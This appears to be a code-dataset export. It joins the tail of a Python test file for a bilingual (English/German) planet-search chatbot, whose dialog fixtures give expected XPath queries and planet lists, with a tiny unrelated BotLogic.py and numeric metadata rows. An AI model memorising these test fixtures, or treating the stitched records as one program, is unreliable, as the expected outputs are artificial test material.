HD 100546 b, SDSS J1110+0116, SIMP0136+0933
Would you like more info on one of these planets?
"""
),
("no", "Would you like to try another search?"),
("no","OK bye!")],
[("hi", "Please enter your search query!"),("which planets have a mass of 1 and which planets were discovered before 2001 and which planets have a mass of 1 and were discovered before 2001?",
"""
Normalized NL Query: which planets have a mass of #num0 and which planets were discovered before #num1 and which planets have a mass of #num2 and were discovered before #num3
XML Queries:['.//planet[mass=1]', './/planet[discoveryyear<=2001]', './/planet[mass=1 and discoveryyear<=2001]']
Here are 6 planets I found for part 1 of the query 'which planets have a mass of 1 and which planets were discovered before 2001 and which planets have a mass of 1 and were discovered before 2001?':
HD 219415 b, HD 75784 b, Kepler-44 b, Jupiter, WASP-129 b, WASP-190 b
Here are 66 planets I found for part 2 of the query 'which planets have a mass of 1 and which planets were discovered before 2001 and which planets have a mass of 1 and were discovered before 2001?':
16 Cygni B b, 47 UMa b, 47 UMa c, 51 Peg b, 55 Cancri b, 70 Vir b, BD-10 3166 b, eps Eridani b, Gliese 3021 A b, Gliese 86 b, Gliese 876 b, Gliese 876 c, HD 10697 b, HD 114762 b, HD 114783 b, HD 12661 b, HD 130322 b, HD 134987 b, HD 142 A b, HD 16141 A b, HD 168443 b, HD 168443 c, HD 169830 b, HD 177830 A b, HD 178911 B b, HD 179949 b, HD 187123 b, HD 192263 b, HD 195019 A b, HD 19994 A b, HD 209458 b, HD 210277 b, HD 213240 A b, HD 217107 b, HD 222582 A b, HD 23079 b, HD 27442 A b, HD 28185 b, HD 37124 b, HD 38529 A b, HD 39091 b, HD 4203 b, HD 4208 b, HD 46375 A b, HD 52265 b, HD 6434 b, HD 68988 b, HD 75289 A b, HD 80606 b, HD 89744 A b, HD 92788 b, HR 810 b, ITG 15B, mu Arae b, PSR 1257+12 A, PSR 1257+12 B, PSR 1257+12 C, PSR B1620-26 b, Rho Coronae Borealis b, Uranus, Neptune, Pluto, tau Boo A b, Upsilon Andromedae A b, Upsilon Andromedae A c, Upsilon Andromedae A d
I did not find any planet for part 3 of the query 'which planets have a mass of 1 and which planets were discovered before 2001 and which planets have a mass of 1 and were discovered before 2001?'.
Would you like more info on one of these planets?
"""
),
("no", "Would you like to try another search?"),
("no","OK bye!")],
[("hi", "Please enter your search query!"),
("Planeten mit einem Radius von maximal 0.05","""
Normalized NL Query: planeten mit einem radius von maximal #num0
XML Queries:['(.//planet[radius<=0.05])[position()<=count(//*)]']
Ich habe die folgenden 13 Planeten gefunden für die Anfrage 'Planeten mit einem Radius von maximal 0.05:'
Kepler-102 b, KOI-115.03, Kepler-1308 b, Kepler-37 b, Kepler-444 b, Kepler-444 c, Kepler-444 d, Kepler-444 e, Kepler-62 c, Kepler-138 b, Mercury, Mars, Pluto
Möchtest du mehr über einen dieser Planeten erfahren?
"""
),
("nein", "Möchtest du eine neue Suche starten?"),
("nein","OK bye!")
],
[("hi", "Bitte gib deine Anfrage ein."),
("Gibt es Planeten mit einem Radius von maximal 0.05?","""
Normalized NL Query: planeten mit einem radius von maximal #num0
XML Queries:['(.//planet[radius<=0.05])[position()<=count(//*)]']
Ich habe die folgenden 13 Planeten gefunden für die Anfrage 'Gibt es Planeten mit einem Radius von maximal 0.05?:'
Kepler-102 b, KOI-115.03, Kepler-1308 b, Kepler-37 b, Kepler-444 b, Kepler-444 c, Kepler-444 d, Kepler-444 e, Kepler-62 c, Kepler-138 b, Mercury, Mars, Pluto
Möchtest du mehr über einen dieser Planeten erfahren?
"""
),
("nein", "Möchtest du eine neue Suche starten?"),
("nein","OK bye!")
],
[("hi", "Bitte gib deine Anfrage ein."),
("Gibt es Planeten mit einem Radius von maximal 0.05?","""
Normalized NL Query: planeten mit einem radius von maximal #num0
XML Queries:['(.//planet[radius<=0.05])[position()<=count(//*)]']
Ich habe die folgenden 13 Planeten gefunden für die Anfrage 'Gibt es Planeten mit einem Radius von maximal 0.05?:'
Kepler-102 b, KOI-115.03, Kepler-1308 b, Kepler-37 b, Kepler-444 b, Kepler-444 c, Kepler-444 d, Kepler-444 e, Kepler-62 c, Kepler-138 b, Mercury, Mars, Pluto
Möchtest du mehr über einen dieser Planeten erfahren?
"""
),
("nein", "Möchtest du eine neue Suche starten?"),
("nein","OK bye!")
],
[("hi", "Bitte gib deine Anfrage ein."),
("Welche Planeten haben einen Radius von unter 0.05?","""
Normalized NL Query: welche planeten haben einen radius von unter #num0
XML Queries:['.//planet[radius<=0.05]']
Ich habe die folgenden 13 Planeten gefunden für die Anfrage 'Welche Planeten haben einen Radius von unter 0.05?:'
Kepler-102 b, KOI-115.03, Kepler-1308 b, Kepler-37 b, Kepler-444 b, Kepler-444 c, Kepler-444 d, Kepler-444 e, Kepler-62 c, Kepler-138 b, Mercury, Mars, Pluto
Möchtest du mehr über einen dieser Planeten erfahren?
"""
),
("nein", "Möchtest du eine neue Suche starten?"),
("nein","OK bye!")
],
[("hi", "Bitte gib deine Anfrage ein."),
("Zeig mir 2 Planeten mit einem Radius von weniger als 0.05","""
Normalized NL Query: #num0 planeten mit einem radius von weniger als #num1
XML Queries:['(.//planet[radius<=0.05])[position()<=2]']
Ich habe die folgenden 2 Planeten gefunden für die Anfrage 'Zeig mir 2 Planeten mit einem Radius von weniger als 0.05:'
Kepler-102 b, KOI-115.03
Möchtest du mehr über einen dieser Planeten erfahren?
"""
),
("nein", "Möchtest du eine neue Suche starten?"),
("nein","OK bye!")
],
[("hi", "Bitte gib deine Anfrage ein."),
("Zeig mir 3 Planeten mit einem Radius von mindestens 1 und einer Masse von maximal 5, die vor 2020 entdeckt wurden.","""
Normalized NL Query: #num0 planeten mit einem radius von mindestens #num1 und einer masse von maximal #num2 die vor #num3 entdeckt wurden
XML Queries:['(.//planet[radius>=1 and mass<=5 and discoveryyear<=2020])[position()<=3]']
Ich habe die folgenden 3 Planeten gefunden für die Anfrage 'Zeig mir 3 Planeten mit einem Radius von mindestens 1 und einer Masse von maximal 5, die vor 2020 entdeckt wurden.:'
51 Eri b, CoRoT-11 b, CoRoT-12 b
Möchtest du mehr über einen dieser Planeten erfahren?
"""
),
("nein", "Möchtest du eine neue Suche starten?"),
("nein","OK bye!")
],
[("hi", "Bitte gib deine Anfrage ein."),
("Zeig mir 1 Planeten mit einem Alter von weniger als 0.1 und einer Masse von mehr als 1, der in 2020 entdeckt wurde, und 3 Planeten, die einen Radius von mindestens 1 haben.","""
Normalized NL Query: #num0 planeten mit einem alter von weniger als #num1 und einer masse von mehr als #num2 der in #num3 entdeckt wurde und #num4 planeten die einen radius von mindestens #num5 haben
XML Queries:['(.//planet[age<=0.1 and mass>=1 and discoveryyear=2020])[position()<=1]', '(.//planet[radius>=1])[position()<=3]']
Ich habe keine Planeten für Teil 1 der Anfrage 'Zeig mir 1 Planeten mit einem Alter von weniger als 0.1 und einer Masse von mehr als 1, der in 2020 entdeckt wurde, und 3 Planeten, die einen Radius von mindestens 1 haben.' gefunden.
Hier sind 3 Planeten, die ich für Teil 2 der Anfrage 'Zeig mir 1 Planeten mit einem Alter von weniger als 0.1 und einer Masse von mehr als 1, der in 2020 entdeckt wurde, und 3 Planeten, die einen Radius von mindestens 1 haben.' gefunden habe:
1RXS1609 b, 2M 2206-20 b, 2MASS J0219-3925 B
Möchtest du mehr über einen dieser Planeten erfahren?
"""
),
("nein", "Möchtest du eine neue Suche starten?"),
("nein","OK bye!")
],
[("hi", "Bitte gib deine Anfrage ein."),
("Welche Planeten haben eine Masse von 1 und welche Planeten wurden vor 2001 entdeckt und welche Planeten haben eine Masse von 1 und wurden vor 2001 entdeckt?","""
Normalized NL Query: welche planeten haben eine masse von #num0 und welche planeten wurden vor #num1 entdeckt und welche planeten haben eine masse von #num2 und wurden vor #num3 entdeckt
XML Queries:['.//planet[mass=1]', './/planet[discoveryyear<=2001]', './/planet[mass=1 and discoveryyear<=2001]']
Hier sind 6 Planeten, die ich für Teil 1 der Anfrage 'Welche Planeten haben eine Masse von 1 und welche Planeten wurden vor 2001 entdeckt und welche Planeten haben eine Masse von 1 und wurden vor 2001 entdeckt?' gefunden habe:
HD 219415 b, HD 75784 b, Kepler-44 b, Jupiter, WASP-129 b, WASP-190 b
Hier sind 66 Planeten, die ich für Teil 2 der Anfrage 'Welche Planeten haben eine Masse von 1 und welche Planeten wurden vor 2001 entdeckt und welche Planeten haben eine Masse von 1 und wurden vor 2001 entdeckt?' gefunden habe:
16 Cygni B b, 47 UMa b, 47 UMa c, 51 Peg b, 55 Cancri b, 70 Vir b, BD-10 3166 b, eps Eridani b, Gliese 3021 A b, Gliese 86 b, Gliese 876 b, Gliese 876 c, HD 10697 b, HD 114762 b, HD 114783 b, HD 12661 b, HD 130322 b, HD 134987 b, HD 142 A b, HD 16141 A b, HD 168443 b, HD 168443 c, HD 169830 b, HD 177830 A b, HD 178911 B b, HD 179949 b, HD 187123 b, HD 192263 b, HD 195019 A b, HD 19994 A b, HD 209458 b, HD 210277 b, HD 213240 A b, HD 217107 b, HD 222582 A b, HD 23079 b, HD 27442 A b, HD 28185 b, HD 37124 b, HD 38529 A b, HD 39091 b, HD 4203 b, HD 4208 b, HD 46375 A b, HD 52265 b, HD 6434 b, HD 68988 b, HD 75289 A b, HD 80606 b, HD 89744 A b, HD 92788 b, HR 810 b, ITG 15B, mu Arae b, PSR 1257+12 A, PSR 1257+12 B, PSR 1257+12 C, PSR B1620-26 b, Rho Coronae Borealis b, Uranus, Neptune, Pluto, tau Boo A b, Upsilon Andromedae A b, Upsilon Andromedae A c, Upsilon Andromedae A d
Ich habe keine Planeten für Teil 3 der Anfrage 'Welche Planeten haben eine Masse von 1 und welche Planeten wurden vor 2001 entdeckt und welche Planeten haben eine Masse von 1 und wurden vor 2001 entdeckt?' gefunden.
Möchtest du mehr über einen dieser Planeten erfahren?
"""
),
("nein", "Möchtest du eine neue Suche starten?"),
("nein","OK bye!")
],
]
def run_test():
ctx = {}
for i,testing_dialog in enumerate(test_set):
print(f'\n\n\n######################## TEST {i} ########################\n\n')
for in_request,true_out_response in testing_dialog:
_, ctx = run_interactive.turn_handler(in_request, ctx, actor, true_out_response=true_out_response)
print("test passed")
if __name__ == "__main__":
run_test()
| 52.540816
| 883
| 0.69664
| 2,749
| 15,447
| 3.905056
| 0.114587
| 0.021239
| 0.008943
| 0.016395
| 0.908803
| 0.892222
| 0.858034
| 0.828878
| 0.8
| 0.763577
| 0
| 0.105213
| 0.189033
| 15,447
| 294
| 884
| 52.540816
| 0.751736
| 0.000453
| 0
| 0.661202
| 0
| 0.229508
| 0.881737
| 0.070582
| 0
| 0
| 0
| 0
| 0
| 1
| 0.005464
| false
| 0.005464
| 0.016393
| 0
| 0.021858
| 0.010929
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fa1a7c8e30744bbd7a4fe700ccb5da5c59470a79
| 208
|
py
|
Python
|
src/Task 2 - API/BotLogic.py
|
Darker97/Virtual-Shop
|
7682feb8257856f2c2960bfb5773a8603432c8c6
|
[
"MIT"
] | null | null | null |
src/Task 2 - API/BotLogic.py
|
Darker97/Virtual-Shop
|
7682feb8257856f2c2960bfb5773a8603432c8c6
|
[
"MIT"
] | 1
|
2020-01-14T14:08:55.000Z
|
2020-01-14T14:08:55.000Z
|
src/Task 2 - API/BotLogic.py
|
Darker97/Virtual-Shop
|
7682feb8257856f2c2960bfb5773a8603432c8c6
|
[
"MIT"
] | 1
|
2022-02-27T15:13:59.000Z
|
2022-02-27T15:13:59.000Z
|
class BotLogic:
def BotExit(Nachricht):
print("Say Goodbye to the Bot")
# Beim Bot abmelden
def BotStart(Nachricht):
print("Say Hello to the Bot")
# Beim Bot anmelden
| 23.111111
| 39
| 0.605769
| 26
| 208
| 4.846154
| 0.615385
| 0.222222
| 0.269841
| 0.190476
| 0.238095
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.3125
| 208
| 9
| 40
| 23.111111
| 0.881119
| 0.168269
| 0
| 0
| 0
| 0
| 0.247059
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0
| 0
| 0.6
| 0.4
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.